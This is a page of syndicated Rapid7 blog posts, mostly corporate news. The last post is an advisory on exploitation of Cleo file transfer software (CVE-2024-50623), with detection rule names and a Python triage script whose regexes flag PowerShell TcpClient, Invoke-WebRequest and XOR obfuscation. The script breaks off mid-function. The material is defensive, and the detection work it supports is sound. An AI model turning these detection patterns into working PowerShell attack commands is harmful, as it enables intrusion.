All posts by Rapid7

Take Command | Rapid7’s 2025 Cybersecurity Summit: First Look at Our Speaker Lineup

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/02/19/take-command-rapid7s-2025-cybersecurity-summit-first-look-at-our-speaker-lineup/


Take Command Summit 2025 is shaping up to be one of the most impactful cybersecurity events of the year, bringing together Rapid7’s own security experts alongside leading industry voices for a full day of insights into today’s evolving attack landscape. This virtual summit will offer actionable strategies, real-world case studies, and expert discussions designed to help security teams take command of their defenses.

While we’ll be revealing the full agenda soon, we’re excited to share a first look at some of the key voices joining us this year to explore proactive risk management and offensive security strategies. These industry leaders will be part of a speaker lineup that includes Rapid7’s own security researchers, SOC experts, and product leaders, all focused on equipping security teams with the knowledge they need to outpace today’s adversaries.

Building a Modern Approach to Risk and Exposure Management

Tyler Shields, Industry Analyst at ESG, brings more than 25 years of experience in cybersecurity research, threat intelligence, and market strategy. As attack surfaces grow—spanning cloud, identity, data, and applications—security teams must shift from reactive to proactive risk management.

At Take Command 2025, he’ll explore how organizations can prioritize risk signals across diverse attack surfaces to build smarter, more proactive defense strategies. His session will provide a roadmap for understanding evolving threats and ensuring security teams focus on the most critical risks before they escalate.

Staying Ahead of Attackers with Continuous Red Teaming

Will Hunt, IT Consultant at In.Security, is a recognized expert in red teaming, penetration testing, and security training, having delivered workshops at Black Hat USA, Asia, and EU. As cyber threats evolve, static defenses and annual penetration tests are no longer enough—security teams need continuous testing strategies to stay ahead of adversaries.

At Take Command 2025, Hunt will join a panel of security experts to discuss how red teaming is evolving in response to expanding and increasingly complex attack surfaces and helping organisations stay ahead of adversaries. This session will explore how proactive testing is helping organizations identify and eliminate weaknesses before attackers can exploit them.

More to Come: A Full Day of Cybersecurity Insights

Take Command 2025 is more than just individual sessions—it’s a full day of expert discussions, deep technical insights, and strategic guidance from some of the best minds in cybersecurity. In addition to these featured speakers, Rapid7’s own security leaders, researchers, and SOC practitioners will provide critical perspectives on:

  • The evolving threat landscape and attacker mindset
  • How AI is redefining security operations and automation
  • Managing risk exposure across complex environments
  • Threat detection, response, and red teaming strategies

…and this is just the beginning! More speakers and sessions will be announced soon, covering the most pressing challenges facing security teams today.

Save Your Spot

Take Command Summit 2025 takes place on April 9, 2025, as a fully virtual, one-day event. Don’t miss the opportunity to hear from industry leaders, engage with Rapid7 experts, and walk away with actionable security strategies.

Register Now

Rapid7 Fills Gaps in the CVE Assessment Process with AI-Generated Vulnerability Scoring in Exposure Command

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/02/19/rapid7-fills-gaps-in-the-cve-assessment-process-with-ai-generated-vulnerability-scoring-in-exposure-command/


The National Vulnerability Database (NVD) announced in February 2024 that it would no longer provide common vulnerability scoring system (CVSS) scores for all CVEs. Due to resource constraints and an inability to keep up with the volume of newly-disclosed vulnerabilities, NVD shifted its focus to processing vulnerabilities more efficiently by relying on vendor-provided and third-party scores rather than scoring each CVE independently.

Many organizations rely on NVD’s CVSS scores as a consistent, centralized guide to measuring the potential risk of vulnerabilities. This is especially useful for teams that don’t have the resources to conduct their own in-depth vulnerability analysis given the pace at which new CVEs are cropping up.

To address this widening gap in vulnerability scoring, and to ensure our customers make informed decisions with an accurate understanding of their current risk posture, we’re excited to announce the release of AI-Generated Risk Scoring in Exposure Command. By integrating a machine learning model, Exposure Command supplements existing CVSS scores with AI-Generated Risk Scores for CVEs where NVD does not provide one, so that every vulnerability carries a severity score.

The need to evolve from traditional vulnerability management practices to Continuous Threat and Exposure Management

Moving beyond simple risk scoring methodologies is critical for modern vulnerability management teams to stay ahead of advanced threats. For many organizations, this means adopting a Risk-Based Vulnerability Management (RBVM) approach.

Put simply, this means incorporating not just a deep and accurate understanding of how risky a given CVE is in a vacuum, but also layering on additional context: reachability and exploitability, asset criticality, a real-world understanding of what threat actors are actively targeting in the wild, and how all of these inputs relate to the organization’s specific environment.

AI-Generated CVSS scoring in Exposure Command feeds directly into our broader Active Risk scoring methodology. More importantly, it empowers Rapid7 to produce predictive CVSS scores by analyzing vulnerability information and comparing with previous expert vulnerability analysis.

The model predicts each CVSS base metric (the individual components of the vector string) separately; once those predictions are combined into a score, 76% of the generated scores fall in the correct severity classification. Combined with Rapid7’s Active Risk calculator, this rises to 87% of scores in the correct classification. The remaining scores are never more than one classification out, so a score that misses lands in an adjacent band (a High, for example, for a vulnerability that an analyst would have scored Medium or Critical), which is worth keeping in mind when a generated score sits near a band boundary.

This insight feeds directly into, and improves the overall accuracy of, our Active Risk scoring models. It also ensures severity scores are assigned and delivered to security teams far faster than manual analysis allows, making your security program more resilient to external change.

By leveraging AI/ML to generate predictive risk scores, security teams benefit from:

  • Enhanced accuracy: A model trained on historical NVD data provides CVSS scores that closely track expert analysis.
  • Predictive scoring: Get immediate insight into the severity of newly-disclosed CVEs that would otherwise be left unscored, without manual aggregation and analysis.
  • Improved security posture: With every CVE assigned a severity score, organizations have the context they need to prioritize remediation effectively and, in turn, strengthen their security posture.

This release represents a major step forward in our mission to provide industry-leading cybersecurity solutions. We expect these enhancements will significantly improve your ability to assess and manage vulnerabilities, giving you the confidence to stay ahead of potential threats. For more detailed information and implementation guidelines, please refer to the release notes. If you’d like to learn more about the Rapid7 AI Engine and how we’re leveraging AI across the platform, download the eBook today!

Interning at Rapid7 Prague: Meet Mko

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/02/10/interning-at-rapid7-prague-meet-mko/


Mkrtich Hovsepyan – most people call him Mko –  is an intern at Rapid7’s fast-growing office in Prague. He graduated from the luminous Charles University in Prague, and is currently a first-year master’s student in Artificial Intelligence there. He was in our first impressive crop of interns, and is sharing his experience as we gear up for our next wave of intern hiring.

How would you summarize your internship with Rapid7?

My internship as a Data Engineering Intern at Rapid7 was an enriching experience where I learned about the processes and pipelines of how data is processed and later utilized for Business Analytics and other spheres. Many people think data engineering is just about knowing SQL, but for me, SQL was only a small part of the role. I worked on projects that allowed me to develop my skills in creating ETL processes and other data workflows. Most importantly, I honed my soft skills, and it was easy to do so because the team and management were very supportive.

What advice would you give your past self before starting your internship?

My advice would be to communicate with as many people as possible. Since your team might be working from different parts of the globe, it can become a bit challenging to connect when you don’t have common lunches or in-person meetings. Rapid7 offers opportunities like Insight Coffees to meet different kinds of people and enhance communication. Also, a friendly tip: try not to merge PRs on a Friday!

What support have you been given while at Rapid7?

I really liked that I was seen as someone worth investing in for the future. This meant my team let me try things on my own, giving me the chance to succeed and also to fail sometimes (and yes, there were a few “interesting surprises” along the way!). They knew that making mistakes is one of the best ways to learn and get better. I’m thankful to my teammates who spent a lot of time explaining the basic processes to me.

What has been your favorite experience while at Rapid7?

We were celebrating the first anniversary of the Rapid7 office in Prague, and there was a fun challenge to gather nine signatures from nine different people. The interesting part was that each person had specific characteristics you had to find – like someone working in a specific team, someone with a sticker on their laptop, or even someone whose shoe size is a prime number! It was a great way to meet new colleagues across different teams.

How would you summarize the culture in 3 words?

Open-Minded, Innovative, Transparent.

At Rapid7, we’re working to create a secure digital world for our customers, our industry, and our communities. We give organizations command of their attack surface with the most adaptive, predictive, and responsive cybersecurity platform – and meaningful, impactful partnership.

The Rapid7 office in Prague opened in October 2023, and has quickly grown to support all areas of our business. Learn more and browse our latest job openings here: https://careers.rapid7.com/rapid7-in-prague

Take Command | Rapid7’s 2025 Cybersecurity Summit: Own Your Attack Surface on April 9

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/02/05/take-command-rapid7s-2025-cybersecurity-summit/


Save the date: April 9, 2025

Take Command is back. After a hugely successful event last year, Rapid7’s cybersecurity summit returns with another stellar lineup to equip security teams with the latest threat intelligence, expert insights, and real-world strategies to take control of an evolving attack landscape.

At Take Command 2025, leading security experts, practitioners, and Rapid7’s own research teams will break down the latest attacker tactics, showcase cutting-edge defensive strategies, and explore how AI, MDR, and exposure management are reshaping cybersecurity. Taking command means shutting down threats before they can disrupt your business, staying ahead of adversaries, and constantly refining your defences—and that’s exactly what this year’s event is all about.

Why Attend?

Expert Research and Intelligence

Gain insights from Rapid7 Labs, the curators of Metasploit and our renowned open-source community. Learn how to safeguard against emerging ransomware threats, state-sponsored tactics, and critical vulnerabilities with cutting-edge research you can act on immediately.

Inside the SOC & Real-World Security Insights

Go inside Rapid7’s always-on SOC and hear how security leaders are tackling attack detection, response, and board-level expectations. Learn from peers and industry experts about managing today’s cybersecurity challenges.

Take Command of Your Attack Surface

Discover how MDR, AI, and exposure management can help you proactively reduce risk and outpace attackers. Eliminate silos, enhance visibility, and take decisive action to secure your organization.

What’s on the Agenda?

Building on last year’s high-impact sessions—including “Ready and Resilient: Before, During, & After Ransomware Attacks” and “Control the Chaos: Building Resilient Cyber Defenses Through AI”—Take Command 2025 will deliver even more insights into today’s most urgent cybersecurity challenges.

This year’s event will focus on:

  • The evolving threat landscape – Understanding adversaries’ latest techniques and how to stay ahead
  • AI and security automation – How AI is transforming detection, response, and cyber resilience
  • Cloud security and MDR – Strengthening defences in modern, hybrid environments
  • Proactive risk and exposure management – Strategies to continuously assess and reduce attack surface risk
  • Security operations in action – Expert insights on threat hunting, red teaming, and real-world SOC strategies

Mark Your Calendar & Save Your Spot

Take Command Summit 2025 takes place on April 9, 2025. This one-day virtual event is completely free and designed to give security professionals the insights they need to stay ahead of attackers.

[Save your spot now]

To see what you missed last year, watch 2024’s sessions here.

Excellence in Leadership: CRN Recognizes Alex Page Among Its 2025 Channel Chiefs

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/02/03/excellence-in-leadership-crn-recognizes-alex-page-among-its-2025-channel-chiefs/


For the third consecutive year, Rapid7’s Alex Page has been honored as a CRN Channel Chief, a testament to his unwavering commitment to driving growth, fostering innovation, and strengthening our global channel partnerships. CRN’s annual Channel Chiefs list showcases the top leaders throughout the IT channel ecosystem who go above and beyond to ensure mutual success with their partners and customers. This recognition highlights Alex’s remarkable leadership as well as the significant strides his team has made in collaboration with Rapid7’s channel ecosystem.

A philosophy that drives success

Alex’s channel philosophy is simple, yet powerful: Focus matters. By identifying and investing in the partners who best align with Rapid7’s goals and have the ability to deliver exceptional customer success, Alex and his team ensure a meaningful and impactful collaboration. This focused approach has not only delivered outstanding mutual results, it has also deepened the appreciation and trust we share with our partners.

Innovating for the future

An example of an impactful initiative led by Alex and his team in 2024 was Rapid7’s partnership with Comcast. This collaboration combines the advanced SecOps technology of Rapid7’s Command Platform with 24/7 SOC capabilities to provide superior threat detection and prevention for Comcast’s small, medium, and large enterprise customers. Through this innovative partnership, we have expanded our partner ecosystem as well as set a new standard for delivering world-class security solutions.

Looking ahead to 2025

As the channel landscape evolves, Alex and his team — supported by the greater Rapid7 organization — are doubling down on three key areas in 2025:

  1. Relationship-focused approach – By focusing on the partners who will solve our customers’ problems, and forming deep relationships with each of them, rather than aiming for a breadth of partners with shallow connections, we will jointly acquire more customers and enable their long-term success.
  2. A unified partner experience – Many of Rapid7’s partners don’t fit cleanly into a single bucket. They’re not just a channel partner or just a service provider; they are many things to their customers. In 2025 and beyond, partners will be able to engage with Rapid7 and their customers in a variety of ways.
  3. Technical enablement and specialization – Partners are making it clear that they need to empower their technical resources more than ever before to meet the evolving security needs of their customers. By prioritizing technical enablement and helping our partners specialize in the many capabilities where Rapid7 technologies lead the market, we will ultimately drive even higher rates of customer satisfaction together, which leads to positive business outcomes for the customer, the partner, and Rapid7.

Shared growth through collaboration

Learn more about sales, technology, and partnerships with Rapid7 by visiting our Partners page.

Paying It Forward: Giving and Receiving Mentorship in Tech

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/01/30/paying-it-forward-giving-and-receiving-mentorship-in-tech/


I’ve never actually seen the 2000 romantic drama Pay It Forward, but the movie’s core idea has stayed with me since I first heard of it:

The best way to repay a favor or good deed is to do one for someone else. You ‘pay it forward,’ and ask that person to do likewise, creating an expanding web of positivity and goodwill.

Cliché as it may sound, it’s served me well over my career. I’ve had many roles over the past 20 years, starting as a junior engineer and progressing into management. My own mentors and coaches shaped my experiences along the way, contributing to that growth.

In return, I try to do the same for others.

Mentorship vs. coaching

I want to briefly look at ‘mentorship’ versus ‘coaching,’ as they are often conflated. There is certainly overlap, but the approach and impetus differs.

Mentorship involves dedicated guidance and support over time. The mentee drives the relationship, the ultimate goal, and the current focus. The mentor maps a path to the goal, and offers personalized knowledge and experience on a one-to-one basis.

Coaching is a more structured approach, primarily driven by the coach. It normally involves specific skill or knowledge training, and often isn’t personalized; it can be extended to groups with minimal change.

I believe that successful learning relationships operate on a spectrum between mentorship and coaching. Particularly in tech, where so-called ‘hard’ and ‘soft’ skills carry equal weight, the focus is a sliding scale over time.

For this article, I’ll focus on the ‘mentor’ and ‘mentee’ roles for simplicity.

Why do people seek mentorship?

Mentee-mentor relationships are inherently transactional – and that’s okay! The mentee has a goal to achieve, and wants help to get there. So what’s in it for both parties?

For mentees, it’s fairly obvious:

  • Skills and experience growth
  • Career advancement
  • Increased profile and exposure
  • Personalized individual guidance

The mentor – wanting to be diligent and accurate with their guidance – sees their own skills and knowledge reinforced. Communication and teaching skills grow. Their ability to elevate others is advantageous for their own career aspirations.

It’s okay to feel good about this – it’s a good thing.

Mentorship and career growth

As you climb the ladder in your career, you will find yourself gaining:

  • The ability to handle increasing ambiguity, complexity, and scope
  • Knowledge and experience you can share with others

Obviously you also have to deliver value, but I see that as a function of the above, plus institutional factors. Your increasing capacity to navigate complex or ambiguous environments, paired with an advanced set of skills, is what propels you from wide-eyed junior to seasoned veteran.

We’re all walking this path in some form. Juniors often need direction on what to do and how to do it. With more experience, there is less direction needed for ‘how’ and more focus on ‘what’ and ‘why.’ You start to own features and systems, and can guide others.

In higher roles, strategy comes to the forefront as you become more aware of business needs, customer requirements, and wider technical challenges. You’ve gone from ‘change this line of code’ to ‘increase this KPI by 20%’. Ambiguity, complexity, and scope all go up as a result.

In addition to changes in your deliverables, success also becomes measured by how well you can elevate others around you. At Rapid7, we look at leaders to be impact multipliers, meaning they have the capacity to drive impact not only in their own roles, but how they support those around them to be successful.

Additionally, you don’t have to wait to be in an official people leader role to have this kind of impact. Being a mentor and elevating others can happen regardless of where you are in your career journey.

Mentoring someone is an investment in the future. You chart a path to success, act as a role model, and in some ways shape the industry to come.

Getting started

Whether you’re looking to become a mentor – or seeking guidance as a mentee – the keys to getting started are relatively similar.

Seeking the right opportunities

  • Take stock of where you have existing relationships to build on, and ask for guidance while sharing your goals for entering into a mentorship relationship.
  • Let your colleagues and manager know that you’re available. Sharing your goals with your manager can help incorporate your mentor experience into your personal development plan, and they may even have recommendations on how to get started. Colleagues can be great mentors/mentees, and may also be able to point you in the right direction to connect with someone.
  • Seek opportunities on Slack, Discord, and other community channels. Going beyond your current employer can expose you to different practices and philosophies that exist within the same field or area of focus.
  • Attend meetups and conferences to network and find opportunities. The goal of attending an event is often to gain knowledge and share best practices, so this is a great audience for you to find your mentor/mentee match.

Establishing guidelines and expectations

It’s important for both parties to agree on some foundational principles, which for me are:

  • Mutual trust and respect
  • Adequate investment of time, effort, and care
  • Fluidity and flexibility
  • Transparency, honesty, and accountability

Maintaining effective mentorships

Let’s look at some other factors to consider and watch for as the relationship evolves:

  • Don’t over-prescribe structure or get bogged down in note-taking – keep it light and fluid to encourage maximum flexibility.
  • There are no ‘stupid questions’ – don’t apologize as a mentee for asking!
  • Leave ego at the door – embrace honest feedback and mutual respect at all times.
  • Safety and trust are essential – but avoid getting too personal in ways that hinder your ability to be honest and open.
  • Mentorship is a vital tool for managers – but transparency can suffer when the mentee is also a direct report. Peer relationships without these power structures can feel ‘safer’ and encourage better transparency.

Conclusion

When it comes to mentorship, my core point is this:

Helping people is good, and you can (and should) do it.

As a mentor, you have the opportunity to shape someone’s career and experience while galvanizing your own skills and future prospects. Start today, in whatever form you can.

As a mentee benefitting from guidance and support in pursuit of your goals, try not to forget to pay it forward. Find someone to guide and help on their journey, as you yourself have been.

Built In Honors Rapid7 with “2025 Best Places To Work” Award

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/01/09/built-in-honors-rapid7-with-2025-best-places-to-work-award/

3 Rapid7 Offices Included in Built In’s “Best Places to Work” Lists


Built In has announced that Rapid7 is being honored in the 2025 Best Places To Work Awards. Specifically, Rapid7 earned recognition for three office locations: Austin, Boston, and Arlington (Washington DC). The annual awards program includes companies of all sizes, from startups to enterprises, and honors both remote-first employers and companies in large tech markets across the U.S.

“When employees join Rapid7, they quickly see how much we care for our people and their experience with us. Through competitive compensation packages, inclusive benefits, and a variety of location specific perks and amenities, we’re committed to ensuring our people are supported in doing their most impactful and creative work.” says Christina Luconi, Chief People Officer at Rapid7.

Lists where Rapid7 offices were featured include:

  • 100 Best Large Places to Work Austin
  • 100 Best Large Places to Work Boston
  • 100 Best Large Places to Work Washington DC (for our Arlington office)
  • 100 Best Places to Work (all sizes) Washington DC (for our Arlington office)

Built In determines the winners of Best Places to Work using company data about compensation and benefits. To reflect the benefits candidates are searching for more frequently on Built In, the program also weighs criteria like remote and flexible work opportunities, programs for DEI and other people-first cultural offerings.

“Being recognized as a Best Place to Work is a testament to these companies’ commitment to building a workplace where individuals and innovation thrive,” says Built In CEO and Founder, Maria Christopoulos Katris. “At Built In, we understand that great companies are powered by great teams, and this achievement showcases their dedication to fostering a culture of growth, inclusivity, and excellence. Congratulations on this well-deserved honor.”

Rapid7 believes that when it comes to creating an exceptional workplace, winning an award doesn’t mean the job is done. Our Workplace Experience and People Strategy teams embrace our core value of ‘Never Done’ by evaluating and evolving our offerings, so our people can build the career experience of a lifetime. Awards like these are one of many components we leverage to ensure we are on the right track, and we look forward to the continued evolution of our workplaces in 2025 and beyond.

Want to learn more about working at Rapid7? Click here for our careers site.

Rapid7 Recognized with Top Score of 100 in 2025 Corporate Equality Index

Post Syndicated from Rapid7 original https://blog.rapid7.com/2025/01/07/rapid7-recognized-with-top-score-of-100-in-2025-corporate-equality-index/


On January 7, the Human Rights Campaign Foundation released their 2025 Corporate Equality Index (CEI), where Rapid7 earned a top score of 100.

The CEI is the nation’s leading benchmark for LGBTQ+ workforce equality, evaluating policies and practices in areas such as non-discrimination, equitable benefits, inclusive cultures, and corporate social responsibility. With this score, Rapid7 is recognized as a leader in LGBTQ+ Workplace Inclusion.

This recognition reflects Rapid7’s core values and our commitment to creating a dynamic workplace where all people can build a rewarding career. Our core value ‘Bring You’ is an invitation for everyone to embrace their uniqueness and bring their true selves to the workplace. We know that fostering a culture of inclusion enables people to be more creative and generate innovative ideas – essential skills when working in the field of cybersecurity. Additionally, we recognize that our work in this space is truly ‘Never Done’. We continuously evaluate, optimize, and seek feedback on programs and practices that support diversity, equity, and inclusion across the business. We’re proud of this recognition, and will continue to work towards building and maintaining a workplace where all people have access to the tools, resources, and communities that enable them to feel seen and valued, so they can make an incredible impact through their work.

In consideration for this recognition, the CEI examined Rapid7’s practices and policies against four core pillars:

  • Non-discrimination policies across business entities
  • Equitable benefits for LGBTQ+ workers and their families
  • Supporting an inclusive culture
  • Corporate social responsibility

“HRC Equality Index recognition reflects a gold standard, one that ensures employees—regardless of their lived experience—have equitable access to benefits and are treated inclusively. We align with the HRC Equality Index standard, as we believe it fosters an environment that enables employees to bring their authentic selves to work. By cultivating an environment that nurtures this dynamic, we empower our people to perform at their best and contribute meaningfully to the success of our business.

Additionally, achieving recognition on the HRC Equality Index underscores our broader commitment to being an employer who strives to reflect the global community we seek to secure. This milestone also highlights how essential equity is to our mission. Equity is a key part of the equation, and it is vital that we never lose sight of its importance.

I am incredibly proud that we are included on the index this year. This achievement reflects our ongoing commitment to fostering innovation, belonging, and excellence in all that we do.”

In addition to offering equitable benefits, Rapid7’s employee resource groups provide opportunities for people to come together around shared experiences. The Pride community provides space for LGBTQ+ employees and their allies to raise visibility and provide support through various virtual and in-office events. These initiatives include hosting external speakers, facilitating open discussions, and organizing celebrations.

To learn more about Rapid7 as a workplace, visit our careers page today.

Navigating Choppy Waters: Top Security Predictions from Rapid7’s 2025 Webinar

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/12/12/navigating-choppy-waters-top-security-predictions-from-rapid7s-2025-webinar/


It’s that time of year again — one year is ending and another is set to begin. And what a year it’s been for the security community! The sheer scale of incidents has left SecOps teams breathless, so thinking about what could be in store next year can be overwhelming.

But there’s no need to panic; despite the disruption, the community has rallied together and risen to the challenge, demonstrating adaptability, collaboration, and resilience. And, most of all, why this industry isn’t for the faint of heart!

Over the last few years, we’ve seen significant interest in our annual Security Predictions webinar. Security teams use the session to take stock of the current year and use the predictions to get a head start on planning for the next.

This year, the webinar was shot in person from Rapid7’s office in Belfast, a city that has emerged as a modern tech innovation hub. From its origins as the shipyards that birthed the Titanic, Belfast’s history is a testament to both ambition and resilience, so it is fitting that this city served as the stage for Rapid7’s annual Security Predictions webinar.

Hosted by industry heavy hitter Brian Honan, CEO of BH Consulting, the webinar brought together Rapid7 security and policy experts Raj Samani, Chief Scientist, and Sabeen Malik, VP of Global Government Affairs and Public Policy.

Looking Back: 2024’s Predictions in Review

Before diving into the future, the panel revisited their predictions for 2024, which focused on three core areas:

1. Increasing risks and regulations will intensify pressure on businesses to navigate evolving demands across a complex global landscape.

Sabeen Malik highlighted that the forecasted rise in cyber regulations materialized, with frameworks like NIS2 and the SEC’s cybersecurity mandates intensifying global compliance demands.

2. Expect a surge in the growth of real-time information sharing within global public-private cyber partnerships.

While strides were made, Raj Samani noted that much of the shared data lacks actionable context, calling for enriched, actionable intelligence that organizations can immediately act upon.

3. The continued use of zero-day vulnerabilities exploited by ransomware groups will compel SOCs to focus on exposure management and validation strategies.

As predicted, ransomware groups continued to exploit zero-day vulnerabilities, a trend exacerbated by their increasing sophistication and access to novel attack vectors.

“2024 was pretty much on the button,” said Brian Honan. “The predictions were accurate, but the challenges they highlighted are far from over.”

2025 Could Be Iceberg Alley: Visibility as a Life Preserver

Prediction 1: Greater visibility will act as a life preserver for security teams treading water across an increasingly complex attack surface.

Visibility isn’t just a cybersecurity buzzword—it’s the foundation of effective defense. Raj Samani summarized this challenge succinctly: “You can’t protect what you don’t know about.”

In today’s environment, where assets span on-premises systems, cloud services, and third-party integrations, organizations often struggle to map their full attack surface. Raj explained how conflicting data from multiple tools complicates this task: “Your endpoint provider says one thing, your VPN provider says another — how do you normalize this information?”

After further discussion, the panellists provided a short, medium and long-term action plan to help defenders strengthen their visibility.

Prediction 2: To thrive in a world where regulatory change is an ongoing concern, SecOps should prepare for both the predictable and the unpredictable.

In cybersecurity, the only constant is change. The panel emphasized the need for agile Security Operations Centers (SOCs) to respond effectively to both expected and unexpected threats.

“This is about moving beyond checkbox exercises,” said Sabeen. “SOC teams must adopt continuous processes and infrastructure to manage a rapidly changing landscape.” She pointed to regulatory frameworks like DORA and NIS2, which mandate real-time monitoring and frequent vulnerability assessments, as drivers of this shift.

The panelists also provided an action plan that prioritizes incident response, real-time threat detection, and continuous vulnerability management to meet evolving compliance and security needs.

Prediction 3: Cybercriminals will increasingly exploit zero-day vulnerabilities, expanding potential entry points and bypassing traditional security measures to deliver more ransomware attacks.

Ransomware remains a dominant threat, evolving as attackers adopt zero-day vulnerabilities to bypass traditional defenses. Raj explained how this shift is lowering the technical barriers for cybercriminals: “Access to zero-days allows even unsophisticated actors to execute devastating attacks.”

The professionalization of ransomware groups further exacerbates the threat. As Sabeen noted, “This is no longer a scattered effort. It’s a highly organized, professional ecosystem, and it’s growing at an unsustainable rate.”

The team outlined an action plan to combat ransomware, including the critical action step of engaging organizational leadership to prioritize cybersecurity investments and ensure board-level awareness of the risks.

“Use this as an opportunity to have meaningful discussions with your board,” Raj advised. “Ransomware is a top concern, and preparation is key.”

Final Thoughts: Staying Resilient in Choppy Waters

While the challenges of 2025 may seem daunting, the panel concluded on a hopeful note. Raj highlighted Rapid7’s commitment to empowering the industry through open-source tools and resources like AttackerKB, Metasploit, and Velociraptor.

“Don’t be overwhelmed,” Raj said. “We’re all in this together, and Rapid7 is here to help with actionable insights and tools that protect what matters most.”

As Brian wrapped up, he reflected on Belfast’s legacy and the lessons it offers. “The Titanic reminds us of both the heights of ambition and the importance of preparation. In cybersecurity, as in life, visibility, adaptability, and resilience are the keys to navigating choppy waters.”

To get a full understanding of what 2025 could bring, watch the Top Cybersecurity Predictions webinar on-demand.

Widespread exploitation of Cleo file transfer software (CVE-2024-50623)

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/12/10/etr-widespread-exploitation-of-cleo-file-transfer-software-cve-2024-50623/

On Monday, December 9, multiple security firms began privately circulating reports of in-the-wild exploitation targeting Cleo file transfer software. Late in the evening of December 9, security firm Huntress published a blog on active exploitation of three different Cleo products:

  • Cleo VLTrader, a server-side solution for “mid-enterprise organizations”
  • Cleo Harmony, which provides file transfer capabilities for “large enterprises”
  • Cleo LexiCom, a desktop-based client for communication with major trading networks  

Huntress’s blog says the exploitation they’re seeing across Cleo products results from an insufficient patch for CVE-2024-50623, a vulnerability disclosed in Cleo VLTrader, Cleo Harmony, and Cleo LexiCom in October 2024. Cleo indicated that the vulnerability was fixed in version 5.8.0.21 of all three solutions, but according to Huntress, 5.8.0.21 remains vulnerable to exploitation. CVE-2024-50623 is an unrestricted file upload and download vulnerability that allows for unauthenticated remote code execution on target systems; the vendor notice quoted below describes the execution path, which runs through the product’s Autorun directory.

Update: Cleo evidently communicated with customers on December 10 acknowledging a “critical vulnerability in Cleo Harmony, VLTrader, and LexiCom that could allow an unauthenticated user to import and execute arbitrary bash or PowerShell commands on the host system by leveraging the default settings of the Autorun directory.”

As of December 10, Rapid7 MDR has confirmed successful exploitation of this issue in customer environments; similar to Huntress, our team has observed enumeration and post-exploitation activity and is investigating multiple incidents.

File transfer software continues to be a target for adversaries, and for financially motivated threat actors in particular. Rapid7 recommends taking emergency action to mitigate risk related to this threat.

Mitigation guidance

The following products and versions are vulnerable to CVE-2024-50623. The information below contradicts previous vendor guidance, which indicated that 5.8.0.21 resolved the issue. Cleo has updated their advisory as of December 10, 2024 to confirm 5.8.0.21 is still vulnerable.

  • Cleo Harmony before and including version 5.8.0.21
  • Cleo VLTrader before and including version 5.8.0.21
  • Cleo LexiCom before and including version 5.8.0.21

According to Huntress, “Cleo is preparing a new CVE designation and expects a new patch to be released mid-week.”

In the absence of an effective patch for CVE-2024-50623 (and any other CVEs that may be assigned to this exploit), Cleo customers should remove affected products from the public internet, ensuring they are behind a firewall. Per Huntress’s investigation, disabling Cleo’s Autorun Directory, which allows command files to be automatically processed, may also prevent the latter part of the attack chain from being executed.

Huntress’s blog has several descriptions of post-exploitation activity, including attack chain artifacts, commands run, and files dropped for persistence. Rapid7 recommends that affected customers review these indicators and investigate their environments for suspicious activity dating back to at least December 3, 2024.

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2024-50623 on Windows with an authenticated vulnerability check expected to be available in today’s (Tuesday, December 10) content release. Please note that content releases are typically available late in the evening ET on Patch Tuesday.

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7’s expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of rules deployed and alerting on behavior related to this threat:

  • Suspicious Process – XORed Data in PowerShell
  • Suspicious Process – PowerShell System.Net.Sockets.TcpClient
  • Attacker Behavior – Possible Cleo MFT Exploitation 2024
  • Attacker Tool – PowerShell -noni -ep -nop Flags
  • Attacker Behavior – Obfuscated Powershell Script Containing -noni -ep -nop Flags
  • Suspicious Process – Powershell Invoke-WebRequest
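As an added example (written for this page; it is not Rapid7’s detection content or Huntress’s tooling), the following Python triages constructed Windows process-creation events for the PowerShell behaviours the rule names above describe: the -noni/-ep/-nop flag combination, System.Net.Sockets.TcpClient, Invoke-WebRequest and -bxor. It decodes an -EncodedCommand payload first so that an obfuscated script is checked as well. The event field names, the regexes, the Java-parent heuristic and the sample command lines are all assumptions made for the illustration.

```python
"""Added example, not Rapid7's rules: triage process-creation events for the
PowerShell behaviours named in the rule list above. Field names, regexes and
sample events are constructed assumptions for this illustration."""
import base64
import re
from typing import Optional

# One regex per behaviour. Names loosely mirror the rule titles above; the
# patterns are my own approximations of what such rules look for.
RULES = {
    # -noni/-NonInteractive, -ep/-ExecutionPolicy (any prefix) and -nop/-NoProfile, all present
    "powershell_noni_ep_nop_flags": re.compile(
        r"(?=.*(?:^|\s)-noni\w*\b)(?=.*(?:^|\s)-e(?:p|x\w*)\b)(?=.*(?:^|\s)-nop\w*\b)",
        re.I | re.S),
    "powershell_tcpclient": re.compile(r"System\.Net\.Sockets\.TcpClient", re.I),
    "powershell_invoke_webrequest": re.compile(r"\bInvoke-WebRequest\b|(?:^|[\s(])iwr\s", re.I),
    "powershell_xor_data": re.compile(r"-bxor\b", re.I),
}

# -EncodedCommand and its short forms (-enc, -ec, -e) followed by a base64 blob
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|nc\w*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(event: dict) -> dict:
    """Apply every rule to one event, scanning the decoded payload as well."""
    cmdline = event.get("cmdline", "")
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    # Assumption: Cleo products run inside a Java host process, so a Java parent
    # spawning PowerShell is recorded as context for the analyst, not as a rule.
    parent = event.get("parent_image", "").lower()
    return {
        "id": event["id"],
        "hits": hits,
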